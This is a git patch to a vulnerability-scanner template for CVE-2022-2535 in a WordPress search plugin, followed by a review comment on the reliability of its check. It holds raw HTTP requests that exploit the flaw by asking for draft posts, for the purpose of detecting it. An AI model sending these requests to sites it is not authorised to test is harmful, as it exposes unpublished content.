From 3a281e8ecf0af4ab066b56d3956572e7fa3e18c3 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Mon, 20 Jan 2025 14:26:03 +0700
Subject: [PATCH] Update CVE-2022-2535.yaml

---
 http/cves/2022/CVE-2022-2535.yaml | 22 ++++++++++++++--------
 1 file changed, 14 insertions(+), 8 deletions(-)

diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml
index b81dd7cef0d..f142216b136 100644
--- a/http/cves/2022/CVE-2022-2535.yaml
+++ b/http/cves/2022/CVE-2022-2535.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-2535
 
 info:
   name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
-  author: r3Y3r53
+  author: r3Y3r53,daffainfo
   severity: medium
   description: |
     The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink 
@@ -31,15 +31,21 @@ info:
   tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"
+  - raw:
+      - |
+        GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=publish HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - 'status_code == 200'
-          - 'contains(content_type, "text/html")'
-          - 'contains(body, "searchwp-live-search-result")'
+          - 'status_code_1 == 200 && status_code_2 == 200'
+          - 'contains(content_type_1, "text/html") && contains(content_type_2, "text/html")'
+          - 'contains(body_1, "searchwp-live-search-result") && contains(body_2, "searchwp-live-search-result")'
+          - "len(body_1) != len(body_2)"
         condition: and
-# digest: 4a0a00473045022011b6ddb96bff3d8683515d93725995406d13f48c88b94b814b59013668150c33022100d951a09e8be7f217b74b5fee347764a92897295efba1283778d30e0cf7f21aee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022011b6ddb96bff3d8683515d93725995406d13f48c88b94b814b59013668150c33022100d951a09e8be7f217b74b5fee347764a92897295efba1283778d30e0cf7f21aee:922c64590222798bb761d5b6d8e72950
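Review bot: The `len(body_1) != len(body_2)` entry added at the end of the DSL list is a weak proof of disclosure: any per-request variation inside the `searchwp-live-search-result` markup (a nonce, a timestamp, a cache-busting token) makes the two lengths differ on a patched site, while a vulnerable site with no draft post matching the query returns equal-length bodies, so both false positives and false negatives are possible. The template does not record the assumption behind the differential; add a comment above the new `raw` requests such as `# Differential check: vulnerable versions honor post_status, so the draft and publish queries return different result sets; equal lengths do not prove the fix and unequal lengths alone do not prove disclosure`. Because the verdict rests on a length comparison rather than on content, a match still needs manual confirmation that body_2 lists titles that are not publicly visible before it is reported as verified; stating that in the description or a comment would help triage. The `_1`/`_2` DSL suffixes are bound to request order, so the two raw requests must stay in the order given here.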